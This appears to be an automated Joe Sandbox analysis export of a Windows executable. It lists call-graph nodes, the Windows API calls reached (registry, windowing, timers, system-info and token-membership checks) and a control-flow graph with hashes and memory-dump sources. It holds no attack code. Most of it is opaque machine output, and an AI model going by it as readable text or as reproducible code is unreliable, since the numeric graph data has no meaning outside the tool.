ae1074 104895 ae52b7 __wsopen_s 104894->104895 104896 aebf73 8 API calls 104895->104896 104897 ae536d 104896->104897 104898 ae5594 10 API calls 104897->104898 104899 ae5376 104898->104899 104926 ae5238 104899->104926 104902 ae6b7c 8 API calls 104903 ae538f 104902->104903 104904 ae6a7c 8 API calls 104903->104904 104905 ae539e 104904->104905 104906 aebf73 8 API calls 104905->104906 104907 ae53a7 104906->104907 104908 aebd57 8 API calls 104907->104908 104909 ae53b0 RegOpenKeyExW 104908->104909 104910 b24be6 RegQueryValueExW 104909->104910 104915 ae53d2 104909->104915 104911 b24c03 104910->104911 104912 b24c7c RegCloseKey 104910->104912 104913 b0017b 8 API calls 104911->104913 104912->104915 104924 b24c8e _wcslen 104912->104924 104914 b24c1c 104913->104914 104916 ae423c 8 API calls 104914->104916 104915->104891 104917 b24c27 RegQueryValueExW 104916->104917 104919 b24c44 104917->104919 104921 b24c5e messages 104917->104921 104918 ae655e 8 API calls 104918->104924 104920 ae8577 8 API calls 104919->104920 104920->104921 104921->104912 104922 aeb329 8 API calls 104922->104924 104923 ae6a7c 8 API calls 104923->104924 104924->104915 104924->104918 104924->104922 104924->104923 104925->104893 104927 b222d0 __wsopen_s 104926->104927 104928 ae5245 GetFullPathNameW 104927->104928 104929 ae5267 104928->104929 104930 ae8577 8 API calls 104929->104930 104931 ae5285 104930->104931 104931->104902 104932 ae1098 104937 ae5fc8 104932->104937 104936 ae10a7 104938 aebf73 8 API calls 104937->104938 104939 ae5fdf GetVersionExW 104938->104939 104940 ae8577 8 API calls 104939->104940 104941 ae602c 104940->104941 104942 aeadf4 8 API calls 104941->104942 104954 ae6062 104941->104954 104943 ae6056 104942->104943 104944 ae55dc 8 API calls 104943->104944 104944->104954 104945 ae611c GetCurrentProcess IsWow64Process 104946 ae6138 104945->104946 104947 b25269 GetSystemInfo 104946->104947 104948 ae6150 LoadLibraryA 104946->104948 104949 ae619d GetSystemInfo 104948->104949 104950 ae6161 GetProcAddress 104948->104950 104951 ae6177 104949->104951 104950->104949 104953 ae6171 GetNativeSystemInfo 104950->104953 104955 ae617b FreeLibrary 104951->104955 104956 ae109d 104951->104956 104952 b25224 104953->104951 104954->104945 104954->104952 104955->104956 104957 b00413 29 API calls __onexit 104956->104957 104957->104936 104958 b31ac5 104959 b31acd 104958->104959 104962 aed535 104958->104962 104989 b47a87 8 API calls __fread_nolock 104959->104989 104961 b31adf 104990 b47a00 8 API calls __fread_nolock 104961->104990 104964 b0014b 8 API calls 104962->104964 104966 aed589 104964->104966 104965 b31b09 104967 af0340 207 API calls 104965->104967 104969 aec32d 8 API calls 104966->104969 104968 b31b30 104967->104968 104970 b31b44 104968->104970 104991 b661a2 53 API calls _wcslen 104968->104991 104972 aed5b3 104969->104972 104973 b0014b 8 API calls 104972->104973 104981 aed66e messages 104973->104981 104974 b31b61 104974->104962 104992 b47a87 8 API calls __fread_nolock 104974->104992 104976 aec3ab 8 API calls 104986 aed9ac messages 104976->104986 104977 aebed9 8 API calls 104977->104981 104980 b31f79 104994 b456ae 8 API calls messages 104980->104994 104981->104977 104981->104980 104982 b31f94 104981->104982 104984 aec3ab 8 API calls 104981->104984 104985 aed911 messages 104981->104985 104993 aeb4c8 8 API calls 104981->104993 104984->104981 104985->104976 104985->104986 104987 aed9c3 104986->104987 104988 afe30a 8 API calls messages 104986->104988 104988->104986 104989->104961 104990->104965 104991->104974 104992->104974 104993->104981 104994->104982 103425 ae36f5 103428 ae370f 103425->103428 103429 ae3726 103428->103429 103430 ae378a 103429->103430 103431 ae372b 103429->103431 103432 ae3788 103429->103432 103436 b23df4 103430->103436 103437 ae3790 103430->103437 103433 ae3738 103431->103433 103434 ae3804 PostQuitMessage 103431->103434 103435 ae376f DefWindowProcW 103432->103435 103440 b23e61 103433->103440 103441 ae3743 103433->103441 103443 ae3709 103434->103443 103435->103443 103483 ae2f92 10 API calls 103436->103483 103438 ae37bc SetTimer RegisterWindowMessageW 103437->103438 103439 ae3797 103437->103439 103438->103443 103446 ae37e5 CreatePopupMenu 103438->103446 103444 b23d95 103439->103444 103445 ae37a0 KillTimer 103439->103445 103486 b4c8f7 65 API calls ___scrt_fastfail 103440->103486 103447 ae380e 103441->103447 103448 ae374d 103441->103448 103451 b23dd0 MoveWindow 103444->103451 103452 b23d9a 103444->103452 103453 ae3907 Shell_NotifyIconW 103445->103453 103446->103443 103473 affcad 103447->103473 103454 b23e46 103448->103454 103455 ae3758 103448->103455 103450 b23e15 103484 aff23c 40 API calls 103450->103484 103451->103443 103459 b23da0 103452->103459 103460 b23dbf SetFocus 103452->103460 103461 ae37b3 103453->103461 103454->103435 103485 b41423 8 API calls 103454->103485 103462 ae37f2 103455->103462 103463 ae3763 103455->103463 103456 b23e73 103456->103435 103456->103443 103459->103463 103464 b23da9 103459->103464 103460->103443 103480 ae59ff DeleteObject DestroyWindow 103461->103480 103481 ae381f 75 API calls ___scrt_fastfail 103462->103481 103463->103435 103470 ae3907 Shell_NotifyIconW 103463->103470 103482 ae2f92 10 API calls 103464->103482 103469 ae3802 103469->103443 103471 b23e3a 103470->103471 103472 ae396b 60 API calls 103471->103472 103472->103432 103474 affd4b 103473->103474 103475 affcc5 ___scrt_fastfail 103473->103475 103474->103443 103476 ae61a9 55 API calls 103475->103476 103478 affcec 103476->103478 103477 affd34 KillTimer SetTimer 103477->103474 103478->103477 103479 b3fe2b Shell_NotifyIconW 103478->103479 103479->103477 103480->103443 103481->103469 103482->103443 103483->103450 103484->103463 103485->103432 103486->103456 103487 b0076b 103488 b00777 ___DestructExceptionObject 103487->103488 103517 b00221 103488->103517 103490 b0077e 103491 b008d1 103490->103491 103494 b007a8 103490->103494 103555 b00baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103491->103555 103493 b008d8 103556 b051c2 28 API calls _abort 103493->103556 103505 b007e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103494->103505 103528 b127ed 103494->103528 103496 b008de 103557 b05174 28 API calls _abort 103496->103557 103500 b008e6 103501 b007c7 103503 b00848 103536 b00cc9 103503->103536 103505->103503 103551 b0518a 38 API calls 3 library calls 103505->103551 103506 b0084e 103540 ae331b 103506->103540 103511 b0086a 103511->103493 103512 b0086e 103511->103512 103513 b00877 103512->103513 103553 b05165 28 API calls _abort 103512->103553 103554 b003b0 13 API calls 2 library calls 103513->103554 103516 b0087f 103516->103501 103518 b0022a 103517->103518 103558 b00a08 IsProcessorFeaturePresent 103518->103558 103520 b00236 103559 b03004 10 API calls 3 library calls 103520->103559 103522 b0023b 103527 b0023f 103522->103527 103560 b12687 103522->103560 103524 b00256 103524->103490 103527->103490 103529 b12804 103528->103529 103530 b00dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 103529->103530 103531 b007c1 103530->103531 103531->103501 103532 b12791 103531->103532 103533 b127c0 103532->103533 103534 b00dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 103533->103534 103535 b127e9 103534->103535 103535->103505 103628 b026b0 103536->103628 103538 b00cdc GetStartupInfoW 103539 b00cef 103538->103539 103539->103506 103541 ae3382 103540->103541 103542 ae3327 IsThemeActive 103540->103542 103552 b00d02 GetModuleHandleW 103541->103552 103630 b052b3 103542->103630 103544 ae3352 103636 b05319 103544->103636 103546 ae3359 103643 ae32e6 SystemParametersInfoW SystemParametersInfoW 103546->103643 103548 ae3360 103644 ae338b 103548->103644 103551->103503 103552->103511 103553->103513 103554->103516 103555->103493 103556->103496 103557->103500 103558->103520 103559->103522 103564 b1d576 103560->103564 103563 b0302d 8 API calls 3 library calls 103563->103527 103565 b1d593 103564->103565 103568 b1d58f 103564->103568 103565->103568 103570 b14f6e 103565->103570 103567 b00248 103567->103524 103567->103563 103582 b00dfc 103568->103582 103571 b14f7a ___DestructExceptionObject 103570->103571 103589 b132d1 EnterCriticalSection 103571->103589 103573 b14f81 103590 b15422 103573->103590 103575 b14f90 103581 b14f9f 103575->103581 103603 b14e02 29 API calls 103575->103603 103578 b14f9a 103604 b14eb8 GetStdHandle GetFileType 103578->103604 103580 b14fb0 __wsopen_s 103580->103565 103605 b14fbb LeaveCriticalSection _abort 103581->103605 103583 b00e05 103582->103583 103584 b00e07 IsProcessorFeaturePresent 103582->103584 103583->103567 103586 b00fce 103584->103586 103627 b00f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103586->103627 103588 b010b1 103588->103567 103589->103573 103591 b1542e ___DestructExceptionObject 103590->103591 103592 b15452 103591->103592 103593 b1543b 103591->103593 103606 b132d1 EnterCriticalSection 103592->103606 103614 b0f649 20 API calls _free 103593->103614 103596 b15440 103615 b12b5c 26 API calls _strftime 103596->103615 103598 b1548a 103616 b154b1 LeaveCriticalSection _abort 103598->103616 103599 b1544a __wsopen_s 103599->103575 103600 b1545e 103600->103598 103607 b15373 103600->103607 103603->103578 103604->103581 103605->103580 103606->103600 103617 b14ff0 103607->103617 103609 b15385 103613 b15392 103609->103613 103624 b13778 11 API calls 2 library calls 103609->103624 103610 b12d38 _free 20 API calls 103612 b153e4 103610->103612 103612->103600 103613->103610 103614->103596 103615->103599 103616->103599 103622 b14ffd _free 103617->103622 103618 b1503d 103626 b0f649 20 API calls _free 103618->103626 103619 b15028 RtlAllocateHeap 103620 b1503b 103619->103620 103619->103622 103620->103609 103622->103618 103622->103619 103625 b0521d 7 API calls 2 library calls 103622->103625 103624->103609 103625->103622 103626->103620 103627->103588 103629 b026c7 103628->103629 103629->103538 103629->103629 103631 b052bf ___DestructExceptionObject 103630->103631 103693 b132d1 EnterCriticalSection 103631->103693 103633 b052ca pre_c_initialization 103694 b0530a 103633->103694 103635 b052ff __wsopen_s 103635->103544 103637 b05325 103636->103637 103638 b0533f 103636->103638 103637->103638 103698 b0f649 20 API calls _free 103637->103698 103638->103546 103640 b0532f 103699 b12b5c 26 API calls _strftime 103640->103699 103642 b0533a 103642->103546 103643->103548 103645 ae339b __wsopen_s 103644->103645 103646 aebf73 8 API calls 103645->103646 103647 ae33a7 GetCurrentDirectoryW 103646->103647 103700 ae4fd9 103647->103700 103649 ae33ce IsDebuggerPresent 103650 b23ca3 MessageBoxA 103649->103650 103651 ae33dc 103649->103651 103652 b23cbb 103650->103652 103651->103652 103653 ae33f0 103651->103653 103804 ae4176 8 API calls 103652->103804 103768 ae3a95 103653->103768 103660 ae3462 103662 b23cec SetCurrentDirectoryW 103660->103662 103663 ae346a 103660->103663 103662->103663 103664 ae3475 103663->103664 103805 b41fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103663->103805 103800 ae34d3 7 API calls 103664->103800 103668 b23d07 103668->103664 103670 b23d19 103668->103670 103806 ae5594 103670->103806 103671 ae347f 103674 ae396b 60 API calls 103671->103674 103678 ae3494 103671->103678 103674->103678 103677 ae34af 103684 ae34b6 SetCurrentDirectoryW 103677->103684 103678->103677 103681 ae3907 Shell_NotifyIconW 103678->103681 103681->103677 103693->103633 103697 b13319 LeaveCriticalSection 103694->103697 103696 b05311 103696->103635 103697->103696 103698->103640 103699->103642 103701 aebf73 8 API calls 103700->103701 103702 ae4fef 103701->103702 103813 ae63d7 103702->103813 103704 ae500d 103705 aebd57 8 API calls 103704->103705 103706 ae5021 103705->103706 103707 aebed9 8 API calls 103706->103707 103708 ae502c 103707->103708 103709 ae893c 8 API calls 103708->103709 103710 ae5038 103709->103710 103711 aeb329 8 API calls 103710->103711 103712 ae5045 103711->103712 103713 aebe2d 39 API calls 103712->103713 103714 ae5055 103713->103714 103715 aeb329 8 API calls 103714->103715 103716 ae507b 103715->103716 103717 aebe2d 39 API calls 103716->103717 103718 ae508a 103717->103718 103719 aebf73 8 API calls 103718->103719 103720 ae50a8 103719->103720 103827 ae51ca 103720->103827 103723 b04d98 _strftime 40 API calls 103724 ae50c2 103723->103724 103725 b24b23 103724->103725 103726 ae50cc 103724->103726 103727 ae51ca 8 API calls 103725->103727 103728 b04d98 _strftime 40 API calls 103726->103728 103729 b24b37 103727->103729 103730 ae50d7 103728->103730 103732 ae51ca 8 API calls 103729->103732 103730->103729 103731 ae50e1 103730->103731 103733 b04d98 _strftime 40 API calls 103731->103733 103736 b24b53 103732->103736 103734 ae50ec 103733->103734 103735 ae50f6 103734->103735 103734->103736 103738 b04d98 _strftime 40 API calls 103735->103738 103737 ae5594 10 API calls 103736->103737 103740 b24b76 103737->103740 103739 ae5101 103738->103739 103741 b24b9f 103739->103741 103742 ae510b 103739->103742 103743 ae51ca 8 API calls 103740->103743 103745 ae51ca 8 API calls 103741->103745 103744 ae512e 103742->103744 103747 aebed9 8 API calls 103742->103747 103746 b24b82 103743->103746 103749 b24bda 103744->103749 103753 ae7e12 8 API calls 103744->103753 103748 b24bbd 103745->103748 103750 aebed9 8 API calls 103746->103750 103751 ae5121 103747->103751 103752 aebed9 8 API calls 103748->103752 103754 b24b90 103750->103754 103755 ae51ca 8 API calls 103751->103755 103756 b24bcb 103752->103756 103757 ae513e 103753->103757 103758 ae51ca 8 API calls 103754->103758 103755->103744 103759 ae51ca 8 API calls 103756->103759 103760 ae8470 8 API calls 103757->103760 103758->103741 103759->103749 103761 ae514c 103760->103761 103762 ae8a60 8 API calls 103761->103762 103765 ae5167 103762->103765 103763 ae893c 8 API calls 103763->103765 103764 ae8a60 8 API calls 103764->103765 103765->103763 103765->103764 103766 ae51ab 103765->103766 103767 ae51ca 8 API calls 103765->103767 103766->103649 103767->103765 103769 ae3aa2 __wsopen_s 103768->103769 103770 ae3abb 103769->103770 103771 b240da ___scrt_fastfail 103769->103771 103772 ae5851 9 API calls 103770->103772 103773 b240f6 GetOpenFileNameW 103771->103773 103774 ae3ac4 103772->103774 103775 b24145 103773->103775 103839 ae3a57 103774->103839 103778 ae8577 8 API calls 103775->103778 103780 b2415a 103778->103780 103780->103780 104402 ae3624 7 API calls 103800->104402 103802 ae347a 103803 ae35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103802->103803 103803->103671 103804->103660 103805->103668 103807 b222d0 __wsopen_s 103806->103807 103808 ae55a1 GetModuleFileNameW 103807->103808 103809 aeb329 8 API calls 103808->103809 103810 ae55c7 103809->103810 103811 ae5851 9 API calls 103810->103811 103812 ae55d1 103811->103812 103814 ae63e4 __wsopen_s 103813->103814 103815 ae8577 8 API calls 103814->103815 103816 ae6416 103814->103816 103815->103816 103817 ae655e 8 API calls 103816->103817 103826 ae644c 103816->103826 103817->103816 103818 aeb329 8 API calls 103819 ae6543 103818->103819 103821 ae6a7c 8 API calls 103819->103821 103820 aeb329 8 API calls 103820->103826 103823 ae654f 103821->103823 103822 ae655e 8 API calls 103822->103826 103823->103704 103825 ae651a 103825->103818 103825->103823 103826->103820 103826->103822 103826->103825 103833 ae6a7c 103826->103833 103828 ae51d4 103827->103828 103829 ae51f2 103827->103829 103830 ae50b4 103828->103830 103832 aebed9 8 API calls 103828->103832 103831 ae8577 8 API calls 103829->103831 103830->103723 103831->103830 103832->103830 103834 ae6a8b 103833->103834 103838 ae6aac __fread_nolock 103833->103838 103836 b0017b 8 API calls 103834->103836 103835 b0014b 8 API calls 103837 ae6abf 103835->103837 103836->103838 103837->103826 103838->103835 103840 b222d0 __wsopen_s 103839->103840 103841 ae3a64 GetLongPathNameW 103840->103841 103842 ae8577 8 API calls 103841->103842 103843 ae3a8c 103842->103843 103844 ae53f2 103843->103844 103845 aebf73 8 API calls 103844->103845 103846 ae5404 103845->103846 104402->103802 104403 b365af 104404 b0014b 8 API calls 104403->104404 104405 b365b6 104404->104405 104409 b4fafb 104405->104409 104407 b365c2 104408 b4fafb 8 API calls 104407->104408 104408->104407 104410 b4fb1b 104409->104410 104411 b4fbe4 104410->104411 104412 b0017b 8 API calls 104410->104412 104411->104407 104413 b4fb57 104412->104413 104415 b4fb79 104413->104415 104417 b4fbed 8 API calls 104413->104417 104415->104411 104416 aebed9 8 API calls 104415->104416 104416->104415 104417->104413 104995 b3400f 104996 aeeeb0 messages 104995->104996 104997 aef211 PeekMessageW 104996->104997 104998 aeef07 GetInputState 104996->104998 104999 aef0d5 104996->104999 105001 b332cd TranslateAcceleratorW 104996->105001 105002 aef28f PeekMessageW 104996->105002 105003 aef104 timeGetTime 104996->105003 105004 aef273 TranslateMessage DispatchMessageW 104996->105004 105005 aef2af Sleep 104996->105005 105006 b34183 Sleep 104996->105006 105007 b333e9 timeGetTime 104996->105007 105024 af0340 207 API calls 104996->105024 105025 af2b20 207 API calls 104996->105025 105027 aef450 104996->105027 105034 aef6d0 104996->105034 105057 afe915 104996->105057 105063 b5446f 8 API calls 104996->105063 105064 b53fe1 81 API calls __wsopen_s 104996->105064 104997->104996 104998->104996 104998->104997 105001->104996 105002->104996 105003->104996 105004->105002 105022 aef2c0 105005->105022 105006->105022 105062 afaa65 9 API calls 105007->105062 105008 aff215 timeGetTime 105008->105022 105009 b4dd87 46 API calls 105009->105022 105011 b3421a GetExitCodeProcess 105014 b34230 WaitForSingleObject 105011->105014 105015 b34246 CloseHandle 105011->105015 105012 b33d51 105017 b33d59 105012->105017 105013 b7345b GetForegroundWindow 105013->105022 105014->104996 105014->105015 105015->105022 105018 b342b8 Sleep 105018->104996 105022->104996 105022->105008 105022->105009 105022->105011 105022->105012 105022->105013 105022->105018 105065 b660b5 8 API calls 105022->105065 105066 b4f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105022->105066 105024->104996 105025->104996 105028 aef46f 105027->105028 105029 aef483 105027->105029 105067 aee960 105028->105067 105099 b53fe1 81 API calls __wsopen_s 105029->105099 105032 aef47a 105032->104996 105033 b34584 105033->105033 105035 aef707 105034->105035 105051 aef7dc messages 105035->105051 105116 b005b2 5 API calls __Init_thread_wait 105035->105116 105036 af0340 207 API calls 105036->105051 105039 b345d9 105041 aebf73 8 API calls 105039->105041 105039->105051 105040 aebf73 8 API calls 105040->105051 105042 b345f3 105041->105042 105117 b00413 29 API calls __onexit 105042->105117 105043 aebe2d 39 API calls 105043->105051 105046 b345fd 105118 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105046->105118 105050 aebed9 8 API calls 105050->105051 105051->105036 105051->105040 105051->105043 105051->105050 105052 af1ca0 8 API calls 105051->105052 105053 aefae1 105051->105053 105054 b53fe1 81 API calls 105051->105054 105115 afb35c 207 API calls 105051->105115 105119 b005b2 5 API calls __Init_thread_wait 105051->105119 105120 b00413 29 API calls __onexit 105051->105120 105121 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105051->105121 105122 b65231 101 API calls 105051->105122 105123 b6731e 207 API calls 105051->105123 105052->105051 105053->104996 105054->105051 105059 afe928 105057->105059 105060 afe959 105057->105060 105058 afe94c IsDialogMessageW 105058->105059 105058->105060 105059->105058 105059->105060 105061 b3eff6 GetClassLongW 105059->105061 105060->104996 105061->105058 105061->105059 105062->104996 105063->104996 105064->104996 105065->105022 105066->105022 105068 af0340 207 API calls 105067->105068 105088 aee99d 105068->105088 105069 b331d3 105113 b53fe1 81 API calls __wsopen_s 105069->105113 105071 aeea0b messages 105071->105032 105072 aeedd5 105072->105071 105083 b0017b 8 API calls 105072->105083 105073 aeeac3 105073->105072 105075 aeeace 105073->105075 105074 aeecff 105076 b331c4 105074->105076 105077 aeed14 105074->105077 105079 b0014b 8 API calls 105075->105079 105112 b66162 8 API calls 105076->105112 105081 b0014b 8 API calls 105077->105081 105078 aeebb8 105084 b0017b 8 API calls 105078->105084 105087 aeead5 __fread_nolock 105079->105087 105093 aeeb6a 105081->105093 105082 b0014b 8 API calls 105082->105088 105083->105087 105090 aeeb29 __fread_nolock messages 105084->105090 105085 b0014b 8 API calls 105086 aeeaf6 105085->105086 105086->105090 105100 aed260 105086->105100 105087->105085 105087->105086 105088->105069 105088->105071 105088->105072 105088->105073 105088->105078 105088->105082 105088->105090 105090->105074 105091 b331b3 105090->105091 105090->105093 105095 b3318e 105090->105095 105097 b3316c 105090->105097 105108 ae44fe 207 API calls 105090->105108 105111 b53fe1 81 API calls __wsopen_s 105091->105111 105093->105032 105110 b53fe1 81 API calls __wsopen_s 105095->105110 105109 b53fe1 81 API calls __wsopen_s 105097->105109 105099->105033 105101 aed29a 105100->105101 105102 aed2c6 105100->105102 105103 aef6d0 207 API calls 105101->105103 105105 aed2a0 105101->105105 105104 af0340 207 API calls 105102->105104 105103->105105 105106 b3184b 105104->105106 105105->105090 105106->105105 105114 b53fe1 81 API calls __wsopen_s 105106->105114 105108->105090 105109->105093 105110->105093 105111->105093 105112->105069 105113->105071 105114->105105 105115->105051 105116->105039 105117->105046 105118->105051 105119->105051 105120->105051 105121->105051 105122->105051 105123->105051 104418 ae1033 104423 ae68b4 104418->104423 104422 ae1042 104424 aebf73 8 API calls 104423->104424 104425 ae6922 104424->104425 104431 ae589f 104425->104431 104427 ae69bf 104428 ae1038 104427->104428 104434 ae6b14 8 API calls __fread_nolock 104427->104434 104430 b00413 29 API calls __onexit 104428->104430 104430->104422 104435 ae58cb 104431->104435 104434->104427 104436 ae58be 104435->104436 104437 ae58d8 104435->104437 104436->104427 104437->104436 104438 ae58df RegOpenKeyExW 104437->104438 104438->104436 104439 ae58f9 RegQueryValueExW 104438->104439 104440 ae592f RegCloseKey 104439->104440 104441 ae591a 104439->104441 104440->104436 104441->104440 104442 b0f06e 104443 b0f07a ___DestructExceptionObject 104442->104443 104444 b0f086 104443->104444 104445 b0f09b 104443->104445 104461 b0f649 20 API calls _free 104444->104461 104455 b094fd EnterCriticalSection 104445->104455 104448 b0f08b 104462 b12b5c 26 API calls _strftime 104448->104462 104449 b0f0a7 104456 b0f0db 104449->104456 104454 b0f096 __wsopen_s 104455->104449 104464 b0f106 104456->104464 104458 b0f0b4 104463 b0f0d1 LeaveCriticalSection __fread_nolock 104458->104463 104459 b0f0e8 104459->104458 104484 b0f649 20 API calls _free 104459->104484 104461->104448 104462->104454 104463->104454 104465 b0f114 104464->104465 104466 b0f12e 104464->104466 104488 b0f649 20 API calls _free 104465->104488 104467 b0dcc5 __fread_nolock 26 API calls 104466->104467 104469 b0f137 104467->104469 104485 b19789 104469->104485 104470 b0f119 104489 b12b5c 26 API calls _strftime 104470->104489 104472 b0f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104472->104459 104475 b0f23b 104477 b0f248 104475->104477 104481 b0f1ee 104475->104481 104476 b0f1bf 104478 b0f1dc 104476->104478 104476->104481 104491 b0f649 20 API calls _free 104477->104491 104490 b0f41f 31 API calls 4 library calls 104478->104490 104481->104472 104492 b0f29b 30 API calls 2 library calls 104481->104492 104482 b0f1e6 104482->104472 104484->104458 104493 b19606 104485->104493 104487 b0f153 104487->104472 104487->104475 104487->104476 104488->104470 104489->104472 104490->104482 104491->104472 104492->104472 104494 b19612 ___DestructExceptionObject 104493->104494 104495 b19632 104494->104495 104496 b1961a 104494->104496 104498 b196e6 104495->104498 104503 b1966a 104495->104503 104519 b0f636 20 API calls _free 104496->104519 104524 b0f636 20 API calls _free 104498->104524 104499 b1961f 104520 b0f649 20 API calls _free 104499->104520 104502 b196eb 104525 b0f649 20 API calls _free 104502->104525 104518 b154ba EnterCriticalSection 104503->104518 104504 b19627 __wsopen_s 104504->104487 104507 b196f3 104526 b12b5c 26 API calls _strftime 104507->104526 104508 b19670 104510 b19694 104508->104510 104511 b196a9 104508->104511 104521 b0f649 20 API calls _free 104510->104521 104512 b1970b __wsopen_s 28 API calls 104511->104512 104517 b196a4 104512->104517 104514 b19699 104522 b0f636 20 API calls _free 104514->104522 104523 b196de LeaveCriticalSection __wsopen_s 104517->104523 104518->104508 104519->104499 104520->104504 104521->104514 104522->104517 104523->104504 104524->104502 104525->104507 104526->104504

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 237 ae5fc8-ae6037 call aebf73 GetVersionExW call ae8577 242 ae603d 237->242 243 b2507d-b25090 237->243 245 ae603f-ae6041 242->245 244 b25091-b25095 243->244 246 b25097 244->246 247 b25098-b250a4 244->247 248 ae6047-ae60a6 call aeadf4 call ae55dc 245->248 249 b250bc 245->249 246->247 247->244 250 b250a6-b250a8 247->250 261 ae60ac-ae60ae 248->261 262 b25224-b2522b 248->262 253 b250c3-b250cf 249->253 250->245 252 b250ae-b250b5 250->252 252->243 256 b250b7 252->256 257 ae611c-ae6136 GetCurrentProcess IsWow64Process 253->257 256->249 259 ae6138 257->259 260 ae6195-ae619b 257->260 263 ae613e-ae614a 259->263 260->263 264 b25125-b25138 261->264 265 ae60b4-ae60b7 261->265 266 b2524b-b2524e 262->266 267 b2522d 262->267 268 b25269-b2526d GetSystemInfo 263->268 269 ae6150-ae615f LoadLibraryA 263->269 271 b25161-b25163 264->271 272 b2513a-b25143 264->272 265->257 273 ae60b9-ae60f5 265->273 274 b25250-b2525f 266->274 275 b25239-b25241 266->275 270 b25233 267->270 276 ae619d-ae61a7 GetSystemInfo 269->276 277 ae6161-ae616f GetProcAddress 269->277 270->275 282 b25165-b2517a 271->282 283 b25198-b2519b 271->283 279 b25150-b2515c 272->279 280 b25145-b2514b 272->280 273->257 281 ae60f7-ae60fa 273->281 274->270 284 b25261-b25267 274->284 275->266 278 ae6177-ae6179 276->278 277->276 285 ae6171-ae6175 GetNativeSystemInfo 277->285 292 ae617b-ae617c FreeLibrary 278->292 293 ae6182-ae6194 278->293 279->257 280->257 286 b250d4-b250e4 281->286 287 ae6100-ae610a 281->287 288 b25187-b25193 282->288 289 b2517c-b25182 282->289 290 b251d6-b251d9 283->290 291 b2519d-b251b8 283->291 284->275 285->278 298 b250e6-b250f2 286->298 299 b250f7-b25101 286->299 287->253 295 ae6110-ae6116 287->295 288->257 289->257 290->257 294 b251df-b25206 290->294 296 b251c5-b251d1 291->296 297 b251ba-b251c0 291->297 292->293 300 b25213-b2521f 294->300 301 b25208-b2520e 294->301 295->257 296->257 297->257 298->257 302 b25103-b2510f 299->302 303 b25114-b25120 299->303 300->257 301->257 302->257 303->257
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00AE5FF7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00B7DC2C,00000000,?,?), ref: 00AE6123
                                                                                                                                                                                                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00AE612A
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AE6155
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AE6167
                                                                                                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00AE6175
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AE617C
                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00AE61A1
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                    • Opcode ID: 0f6fcc92ba2a20fabef609d6620fb6cd8a30bc52598ccd8c4b79200eea571f23
                                                                                                                                                                                                                                                                                    • Instruction ID: c521f79a860acdcba9365125f69d10951f9693bcfded6255e30cd1ddb8743c8a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f6fcc92ba2a20fabef609d6620fb6cd8a30bc52598ccd8c4b79200eea571f23
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77A1833290A3D4DFC722CB797C451997FE4AB36380B084A99D485A7362CEFD4548CB3A

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00AE3368,?), ref: 00AE33BB
